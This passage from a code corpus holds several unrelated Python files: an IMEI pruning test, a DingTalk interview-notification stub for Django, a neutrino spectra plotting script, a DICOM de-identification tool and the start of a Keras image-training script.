from_cond_dict_list_to_cond_list(cond_dict_list))\n with db_conn.cursor() as cur:\n result = runner.invoke(dirbs_prune_cli, ['--curr-date', '20170913',\n 'classification_state'],\n obj={'APP_CONFIG': mocked_config})\n\n assert result.exit_code == 0\n # ITEMS REMOVED\n # [('17272317272723', 'local_stolen', None), ('12909602872723', 'local_stolen', None),\n # ('12875502572723', 'local_stolen', None), ('12875507272312', 'local_stolen', None),\n # ('64220297727231', 'local_stolen', None), ('12909602432585', 'local_stolen', None),\n # ('64220204327947', 'local_stolen', None), ('72723147267631', 'local_stolen', None),\n # ('72723147267231', 'local_stolen', None), ('12922902243260', 'local_stolen', None),\n # ('12875502464321', 'local_stolen', None), ('12922902432776', 'local_stolen', None),\n # ('12957272313271', 'local_stolen', None), ('12640904324427', 'local_stolen', None),\n # ('12904502843271', 'local_stolen', None), ('12922902432742', 'local_stolen', None),\n # ('12432807272315', 'local_stolen', None), ('12922902206948', 'local_stolen', None),\n # ('56773605727231', 'local_stolen', None), ('12727231272313', 'local_stolen', None),\n # ('12640904372723', 'local_stolen', None),\n # ('21111111111111', 'gsma_not_found', datetime.date(2016, 1, 1)),\n # ('21111111111112', 'gsma_not_found', datetime.date(2016, 1, 1))]\n\n cur.execute('SELECT imei_norm, cond_name, end_date '\n 'FROM classification_state '\n 'ORDER BY cond_name, imei_norm, end_date')\n res_list = cur.fetchall()\n pruned_class_state_table = [(x.imei_norm, x.cond_name, x.end_date) for x in res_list]\n\n assert pruned_class_state_table == [('8888#888622222', 'gsma_not_found', None),\n ('88888862222209', 'gsma_not_found', None),\n ('88888888622222', 'gsma_not_found', datetime.date(2017, 7, 13)),\n ('88888888622222', 'gsma_not_found', None),\n ('8888#888622222', 'malformed_imei', None),\n ('21111111111111', 'not_on_registration_list', None),\n ('21111111111112', 'not_on_registration_list', None),\n ('8888#888622222', 'not_on_registration_list', None),\n ('88888862222209', 'not_on_registration_list', None),\n ('88888888622222', 'not_on_registration_list', None)]\n", "sub_path": "tests/prune.py", "file_name": "prune.py", "file_ext": "py", "file_size_in_byte": 18182, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "click.testing.CliRunner", "line_number": 73, "usage_type": "call"}, {"api_name": "dirbs.cli.prune.cli", "line_number": 74, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 46, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 46, "usage_type": "attribute"}, {"api_name": "_importer_params.OperatorDataParams", "line_number": 47, "usage_type": "call"}, {"api_name": "click.testing.CliRunner", "line_number": 150, "usage_type": "call"}, {"api_name": "dirbs.cli.classify.cli", "line_number": 152, "usage_type": "argument"}, {"api_name": "_helpers.get_importer", "line_number": 196, "usage_type": "call"}, {"api_name": "dirbs.importer.gsma_data_importer.GSMADataImporter", "line_number": 196, "usage_type": "argument"}, {"api_name": "_importer_params.GSMADataParams", "line_number": 203, "usage_type": "call"}, {"api_name": "_helpers.expect_success", "line_number": 204, "usage_type": "call"}, {"api_name": "dirbs.cli.classify.cli", "line_number": 206, "usage_type": "argument"}, {"api_name": "datetime.date", "line_number": 222, "usage_type": "call"}, {"api_name": "_helpers.get_importer", "line_number": 224, "usage_type": "call"}, {"api_name": "dirbs.importer.gsma_data_importer.GSMADataImporter", "line_number": 224, "usage_type": "argument"}, {"api_name": "_importer_params.GSMADataParams", "line_number": 231, "usage_type": "call"}, {"api_name": "_helpers.expect_success", "line_number": 232, "usage_type": "call"}, {"api_name": "dirbs.cli.classify.cli", "line_number": 234, "usage_type": "argument"}, {"api_name": "datetime.date", "line_number": 246, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 247, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 250, "usage_type": "call"}, {"api_name": "_helpers.from_cond_dict_list_to_cond_list", "line_number": 282, "usage_type": "call"}, {"api_name": "dirbs.cli.prune.cli", "line_number": 284, "usage_type": "argument"}, {"api_name": "datetime.date", "line_number": 312, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 94, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 94, "usage_type": "attribute"}, {"api_name": "_importer_params.OperatorDataParams", "line_number": 95, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 109, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 109, "usage_type": "attribute"}, {"api_name": "_importer_params.GSMADataParams", "line_number": 110, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 112, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 112, "usage_type": "attribute"}, {"api_name": "_importer_params.StolenListParams", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "10862311", "text": "# https://github.com/zhuifengshen/DingtalkChatbot\n# pip install DingtalkChatbot\n# '通知一面面试官'\nfrom django.contrib import messages\n\n\ndef notify_interviewer(self, request, queryset):\n candidates = ''\n interviewers = ''\n for obj in queryset:\n candidates = obj.username + ';' + candidates\n interviewers = f'{obj.first_interviewer_user};{interviewers}'\n # dingtalk\n print('候选人 %s 进入面试环节,亲爱的面试官,请准备好测试: %s' % (candidates, interviewers))\n messages.add_message(request, messages.INFO, '已经成功发送面试通知')\n\n# from dingtalkchatboot.chatbot import DingtalkChatbot\n# from django.conf import settings\n# def send(message, at_mobiles=[]):\n# webhook = settings.DINGTALK_WEB_HOOK\n# xiaoding = DingtalkChatbot(webhook)\n#\n# #方式二: 勾选\"加签\"选项时使用(.v1.5以上新功能)\n# #xiaoding = DingtalkChatbot(webhook, secret=secret)\n#\n# Text消息@所有人\n# xiaoding.send('候选人 %s 进入面试环节,亲爱的面试官,请准备好测试: %s' % (candidates, interviewers))\n", "sub_path": "python_02_django/02_django_admin/apps/myapp/admin_08_dingtalk_intergrated.py", "file_name": "admin_08_dingtalk_intergrated.py", "file_ext": "py", "file_size_in_byte": 1102, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.messages.add_message", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 15, "usage_type": "name"}, {"api_name": "django.contrib.messages.INFO", "line_number": 15, "usage_type": "attribute"}]} +{"seq_id": "110806387", "text": "import numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\nfrom scipy.special import lpmv, gamma\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Read neutrino energy files\")\nparser.add_argument(\"--mass\",help=\"progenitor mass to use as input, default 10\",type=str,default='10')\nparser.add_argument(\"--neutrino\",help=\"neutrino species to use as input, default 0\",type=str,default='0')\nargs = parser.parse_args()\n\n#read luminosity angle-averaged data, spectra data, and full luminosity data, respectively\nlum_dat = np.loadtxt(\"lum_{}M_inu{}.dat\".format((args.mass),(args.neutrino)))\nspec_dat = np.loadtxt(\"lum_spec_{}M_inu{}.dat\".format((args.mass),(args.neutrino)))\nlum_file = h5py.File(\"lum_spec_{}M.h5\".format(args.mass),\"r\")\n\ngrid_file= h5py.File(\"grid.h5\",\"r\")\nphic = np.array(grid_file[\"phic\"])\nthetac = np.array(grid_file[\"thc\"])\ndOmega = np.array(grid_file[\"dOmega\"])\n\ndef fact(n):\n \"\"\"\n Note: math.factorial returns an int, but we want to work only with floats\n \"\"\"\n return gamma(n + 1.)\n\ndef real_sph_harm(l, m, phi=phic, theta=thetac):\n \"\"\"\n Computes the orthonormalized real spherical harmonics Y_lm\n \"\"\"\n if m < 0:\n norm = np.sqrt((2*l + 1.)/(2*np.pi)*fact(l + m)/fact(l - m))\n return norm*np.outer(lpmv(-m, l, np.cos(theta)), np.sin(-m*phi))\n elif m == 0:\n norm = np.sqrt((2*l + 1.)/(4*np.pi))\n return norm*np.outer(lpmv(0, l, np.cos(theta)), np.ones_like(phi))\n else:\n norm = np.sqrt((2*l + 1.)/(2*np.pi)*fact(l - m)/fact(l + m))\n return norm*np.outer(lpmv(m, l, np.cos(theta)), np.cos(m*phi))\n\n#read time and luminosity\ntime = lum_dat[:,0]\nlum_avg = lum_dat[:,1]\n\n#plot angle-averaged Luminosity\nplt.figure()\nplt.plot(time,lum_avg/100.)\nplt.xlabel(r'Time after bounce [s]')\nplt.ylabel(r'Luminosity [10$^{52}$ erg s$^{-1}$]')\nplt.savefig(r'Lum_avg.pdf')\nplt.close()\n\n#plot nu0 luminosity spectra at a given time (index 300 here)\nplt.figure()\nplt.plot(spec_dat[300][1:13],spec_dat[300][13:25],'o')\nplt.figtext(0.6,0.6,'Time = {} s'.format(spec_dat[300][0]))\nplt.xlabel(r'Energy [MeV]')\nplt.ylabel(r'$dL_{\\nu_e}/d\\varepsilon$ [10$^{50}$ erg s$^{-1}$ MeV$^{-1}$]')\nplt.xlim([0,60])\nplt.savefig(r'spec.pdf')\nplt.close()\n\n#plot mean neutrino energy, averaged over all bins and over solid angle\ntime = lum_file[\"nu{}\".format(args.neutrino)][\"g0\"].attrs[\"time\"]\neave = np.array(lum_file[\"nu{}\".format(args.neutrino)][\"eave\"][\"l=0 m=0\"])/np.sqrt(4*np.pi)\nplt.figure()\nplt.plot(time,eave)\nplt.xlabel(r'Time after bounce [s]')\nplt.ylabel(r'Average Neutrino Energy [10$^{50}$ erg s$^{-1}$]')\nplt.savefig(r'eave_avg.pdf')\nplt.close()\n\n#define total, angle-dependent luminosity Ltot_angle\ndum_idx=1\nLtot_angle=np.zeros((len(lum_avg),len(thetac),len(phic)))\nfor l in range(3):\n for m in range(-l,l+1):\n print(l,m)\n Ltot_angle += real_sph_harm(l,m)*lum_dat[:,dum_idx][:,np.newaxis,np.newaxis]\n dum_idx+=1\n\nPH, TH = np.meshgrid(phic, thetac)\ncf = plt.contourf(PH, TH, Ltot_angle[0])\ncb = plt.colorbar(cf)\nplt.show()\n", "sub_path": "models/Fornax_2019/data/spectra_reader.py", "file_name": "spectra_reader.py", "file_ext": "py", "file_size_in_byte": 3027, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 14, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 15, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.special.gamma", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 33, "usage_type": "attribute"}, {"api_name": "numpy.outer", "line_number": 34, "usage_type": "call"}, {"api_name": "scipy.special.lpmv", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.outer", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.special.lpmv", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.outer", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.special.lpmv", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figtext", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 66, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.meshgrid", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}]} +{"seq_id": "616784550", "text": "#!/usr/bin/env python3\n\nimport os\nimport os.path\nimport shutil\nimport yaml\nimport csv\nimport pydicom\nfrom pydicom import dcmread\nfrom docopt import docopt\nfrom poly_juice.lumberjack import Lumberjack\nfrom poly_juice.filch import DicomCaretaker\nfrom poly_juice.dicom_image import DicomImage\n\ndocstr = \"\"\"\nPolyjuice\nUsage:\n polyjuice.py (-h | --help)\n polyjuice.py [-vz] ( ) []\n polyjuice.py [-vzc] []\n\nOptions:\n -h --help Show this message and exit\n -z --zip Archives the output folder\n -v --verbose Give progress of program in terminal\n -c --config Use config file to get input and output paths\n\nInstructions:\n Run polyjuice on individual files, ISOs, or directories. This will give an\n ouput folder containing dicom files that have had their tags cleaned\n according to your standards set in the config file.\n\"\"\"\n\nCONFIG_PATH = ''\nINPUT_DIR = ''\nOUTPUT_DIR = ''\n_verbose = '--verbose'\n_zip_folder = '--zip'\n_use_config = '--config'\n\n\ndef get_config(config_path: str) -> dict:\n '''\n Read in the config file. If the config file is missing or the wrong\n format, exit the program.\n '''\n try:\n with open(config_path, 'r') as config_file:\n config = yaml.load(config_file.read(), Loader=yaml.FullLoader)\n except Exception as e:\n print(\"Error: Check config file\")\n exit(e)\n return config\n\n\ndef check_directory(out_dir: str) -> None:\n '''\n Check if directory exists. If not, create it.\n '''\n if not os.path.exists(out_dir):\n try:\n os.makedirs(out_dir)\n except Exception as e:\n raise e\n\n\ndef check_mag_field(editor: DicomCaretaker, output_file, value,\n log: Lumberjack) -> str:\n\n ds = dcmread(output_file)\n\n try:\n name = os.path.basename(output_file)\n working_message = \"Checking header on {}\".format(name)\n log(working_message)\n\n if ds.MagneticFieldStrength is not None:\n value = ds.MagneticFieldStrength\n except Exception:\n ds.MagneticFieldStrength = value\n ds.save_as(output_file)\n log(\"MagneticFieldStrength added for {}\".format(name))\n\n return value\n\n\ndef identify_output(editor: DicomCaretaker, working_file: str, out_dir: str,\n id_pairs: dict, log: Lumberjack) -> str:\n\n name = os.path.basename(working_file)\n with open(working_file, 'rb') as working_file:\n working_message = \"Working on {}\".format(name)\n log(working_message)\n image = DicomImage(working_file)\n\n id_issue = image.update_patient_id(id_pairs, log)\n if id_issue:\n editor.report_id(id_issue, log)\n\n folder_name = editor.get_folder_name(image)\n identified_folder = os.path.join(out_dir, folder_name)\n\n output_name = os.path.join(identified_folder, name)\n\n return output_name\n\n\ndef walk_directory(parent_file: str, out_dir: str, zip_dir: str,\n modifications: dict, id_pairs: dict, dicom_folders: list,\n log: Lumberjack) -> list:\n '''\n Walk through directories and send individual files to be cleaned.\n '''\n editor = DicomCaretaker()\n mag_field = ''\n\n if os.path.isfile(parent_file):\n try:\n if parent_file.endswith(\".iso\"):\n # Mount and unmount ISO\n new_parent_dir = editor.mount_iso(parent_file, out_dir)\n dicom_folders = walk_directory(new_parent_dir, out_dir,\n zip_dir, modifications,\n id_pairs, dicom_folders, log)\n editor.unmount_iso()\n else:\n # Send file to be cleaned\n first_file = parent_file\n output_file = identify_output(editor, parent_file, out_dir,\n id_pairs, log)\n dicom_folders = clean_files(editor, parent_file, out_dir,\n first_file, modifications,\n id_pairs, dicom_folders, log)\n mag_field = check_mag_field(editor, output_file, mag_field, log)\n except Exception as e:\n print(\"{} failed\".format(parent_file))\n print(str(e))\n failure_message = \"{} failed\".format(parent_file) + \"\\n\" + str(e)\n log(failure_message)\n\n else:\n for path, subdirs, files in os.walk(parent_file):\n first_file = ''\n for name in files:\n path_message = os.path.join(path, name)\n log(path_message)\n try:\n check_file_type = os.path.join(path, name)\n working_file = os.path.join(path, name)\n if check_file_type.endswith(\".iso\"):\n # Mount and Unmount ISO\n new_parent_dir = editor.mount_iso(working_file,\n out_dir)\n dicom_folders = walk_directory(new_parent_dir, out_dir,\n zip_dir, modifications,\n id_pairs, dicom_folders,\n log)\n editor.unmount_iso()\n else:\n # Send file to be cleaned\n output_file = identify_output(editor, working_file,\n out_dir, id_pairs, log)\n if first_file == '':\n first_file = working_file\n dicom_folders = clean_files(editor, working_file, out_dir,\n first_file, modifications,\n id_pairs, dicom_folders, log)\n mag_field = check_mag_field(editor, output_file, mag_field, log)\n\n except Exception as e:\n print(\"{} failed\".format(name))\n print(str(e))\n failure_message = \"{} failed\".format(name) + \"\\n\" + str(e)\n log(failure_message)\n return dicom_folders\n\n\ndef clean_files(editor: DicomCaretaker, working_file: str, out_dir: str,\n first_file: str,\n modifications: dict, id_pairs: dict, dicom_folders: list,\n log: Lumberjack) -> list:\n '''\n Use DicomCaretaker to clean files and find approprite folders\n to save the output\n '''\n try:\n name = os.path.basename(working_file)\n first_file_modified = get_modified_first_file(first_file)\n\n with open(working_file, 'rb') as working_file:\n image = DicomImage(working_file)\n\n editor.scrub(image, modifications, id_pairs, log)\n\n folder_name = editor.get_folder_name(image)\n identified_folder = os.path.join(out_dir, folder_name)\n\n check = os.path.join(folder_name, name)\n if check in first_file or check in first_file_modified:\n check_directory(identified_folder)\n dicom_folders.append(identified_folder)\n\n editor.save_output(image, identified_folder, name)\n saving_message = \"Saved to {}\".format(identified_folder)\n log(saving_message)\n\n except Exception as e:\n print(\"{} failed\".format(name))\n failure_message = \"{} failed\".format(name) + \"\\n\" + str(e)\n log(failure_message)\n return dicom_folders\n\n\ndef zip_folder(dicom_folders: list, zip_dir: str, log: Lumberjack) -> None:\n '''\n Zip folders with cleaned DICOM images and\n move them to zip directory specified in config file\n '''\n for folder in dicom_folders:\n shutil.make_archive(folder, 'zip', folder)\n zipped_message = \"{} archived\".format(folder)\n log(zipped_message)\n\n check_directory(zip_dir)\n os.system(\"mv {}.zip {}\".format(folder, zip_dir))\n move_zip_message = \"{} moved to {}\".format(folder, zip_dir)\n log(move_zip_message)\n\n\ndef get_modified_first_file(first_file: str):\n first_file_modified_arr = first_file.split('/')\n in_folder_name = first_file_modified_arr[-2]\n in_folder_arr = in_folder_name.split(\"_\")\n in_folder_arr[0] = in_folder_arr[0].split(\"-\")[0]\n first_file_modified_arr[-2] = \"_\".join(in_folder_arr)\n first_file_modified = \"/\".join(first_file_modified_arr)\n return first_file_modified\n\n\ndef main(args):\n if not args[CONFIG_PATH]:\n args[CONFIG_PATH] = 'poly_juice/config.yaml'\n\n config = get_config(args[CONFIG_PATH])\n modifications = config.get('modifications')\n\n reset_IDS = config.get('new_IDs')\n if reset_IDS is None:\n reset_IDS = 'poly_juice/ids.csv'\n\n # converting the ptid as (ptid+visit_no) into only (ptid) by writing them into ids.csv\n input_root = ''\n\n if args[_use_config]:\n input_root = config.get('in_data_root')\n else:\n input_root = args[INPUT_DIR]\n with open(reset_IDS, mode='a') as in_oldIDfile:\n writer = csv.writer(in_oldIDfile, delimiter=\",\")\n for path, subdirs, files in os.walk(input_root):\n for folder in subdirs:\n folder_name_arr = folder.split(\"_\")\n ptid = folder_name_arr[0]\n ptid_visit = ptid.split(\"-\")\n\n if len(ptid_visit) > 1:\n writer.writerow([ptid, ptid_visit[0]])\n\n\n try:\n with open(reset_IDS, mode='r') as in_oldIDfile:\n reader = csv.reader(in_oldIDfile)\n id_pairs = {rows[0]:rows[1] for rows in reader}\n except Exception as e:\n print(\"Check CSV. \\n\" + str(e))\n return\n\n if args[_zip_folder]:\n zip_dir = config.get('zip')\n print(\"zip folder \" + str(zip_dir))\n else:\n zip_dir = None\n\n verbose = args[_verbose]\n\n dicom_folders = []\n if args[_use_config]:\n # Get inputs/outputs from config file\n in_root = config.get('in_data_root')\n out_root = config.get('out_data_root')\n io_pairs = config.get('io_pairs')\n\n for io_pair in io_pairs:\n out_dir = os.path.join(out_root, io_pair['output'])\n check_directory(out_dir)\n log_path = os.path.join(out_dir, 'log.txt')\n log = Lumberjack(log_path, verbose)\n parent_file = os.path.join(in_root, io_pair['input'])\n dicom_folders = walk_directory(parent_file, out_dir, zip_dir,\n modifications, id_pairs,\n dicom_folders, log)\n\n else:\n # Loop through ISOs and subdirectories\n parent_file = args[INPUT_DIR]\n out_dir = args[OUTPUT_DIR]\n check_directory(out_dir)\n log_path = os.path.join(out_dir, 'log.txt')\n log = Lumberjack(log_path, verbose)\n dicom_folders = walk_directory(parent_file, out_dir, zip_dir,\n modifications, id_pairs, dicom_folders,\n log)\n\n if zip_dir:\n zip_folder(dicom_folders, zip_dir, log)\n\n\nif __name__ == '__main__':\n args = docopt(docstr)\n main(args)\n", "sub_path": "poly_juice/polyjuice.py", "file_name": "polyjuice.py", "file_ext": "py", "file_size_in_byte": 11465, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "yaml.load", "line_number": 49, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 62, "usage_type": "call"}, {"api_name": "poly_juice.filch.DicomCaretaker", "line_number": 67, "usage_type": "name"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 68, "usage_type": "name"}, {"api_name": "pydicom.dcmread", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "poly_juice.filch.DicomCaretaker", "line_number": 87, "usage_type": "name"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 88, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "poly_juice.dicom_image.DicomImage", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 110, "usage_type": "name"}, {"api_name": "poly_juice.filch.DicomCaretaker", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path", "line_number": 148, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "poly_juice.filch.DicomCaretaker", "line_number": 178, "usage_type": "name"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 181, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path", "line_number": 187, "usage_type": "attribute"}, {"api_name": "poly_juice.dicom_image.DicomImage", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 198, "usage_type": "call"}, {"api_name": "os.path", "line_number": 198, "usage_type": "attribute"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 214, "usage_type": "name"}, {"api_name": "shutil.make_archive", "line_number": 220, "usage_type": "call"}, {"api_name": "os.system", "line_number": 225, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 259, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 260, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 272, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 294, "usage_type": "call"}, {"api_name": "os.path", "line_number": 294, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 296, "usage_type": "call"}, {"api_name": "os.path", "line_number": 296, "usage_type": "attribute"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 298, "usage_type": "call"}, {"api_name": "os.path", "line_number": 298, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 308, "usage_type": "call"}, {"api_name": "os.path", "line_number": 308, "usage_type": "attribute"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 309, "usage_type": "call"}, {"api_name": "docopt.docopt", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "69109983", "text": "# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nimport h5py\nfrom pathlib import Path\nimport os\n\nimport keras\nfrom keras import layers\nfrom keras import models\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\nfrom keras import regularizers\nfrom keras.layers import AveragePooling2D, MaxPooling2D\n\nfrom sklearn.model_selection import StratifiedKFold\nimport datetime\nfrom keras.models import save_model\nfrom tensorflow.python.keras.models import Model, load_model, save_model\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\nfrom sklearn.metrics import f1_score\n\nwd = os.getcwd()\nhdf5_dir = Path(wd + '/drive/My Drive/Colab Notebooks/Thesis/')\n\n#https://realpython.com/storing-images-in-python/#storing-with-hdf5\ndef read_many_hdf5(num_images):\n \"\"\" Reads image from HDF5.\n Parameters:\n ---------------\n num_images number of images to read\n\n Returns:\n ----------\n images images array, (N, 32, 32, 3) to be stored\n labels associated meta data, int label (N, 1)\n \"\"\"\n images, labels = [], []\n\n # Open the HDF5 file\n file = h5py.File(hdf5_dir / f\"{num_images}.h5\", \"r+\")\n\n images = np.array(file[\"/images\"]).astype(\"uint8\")\n labels = np.array(file[\"/meta\"]).astype(\"uint8\")\n\n return images, labels\n\n#Augmented data\nx_train, y_train = read_many_hdf5(2995)\nx_test, y_test = read_many_hdf5(40)\nx_val, y_val = read_many_hdf5(749)\n\n#Concatenate for k-fold cross validation\nx_trainz = 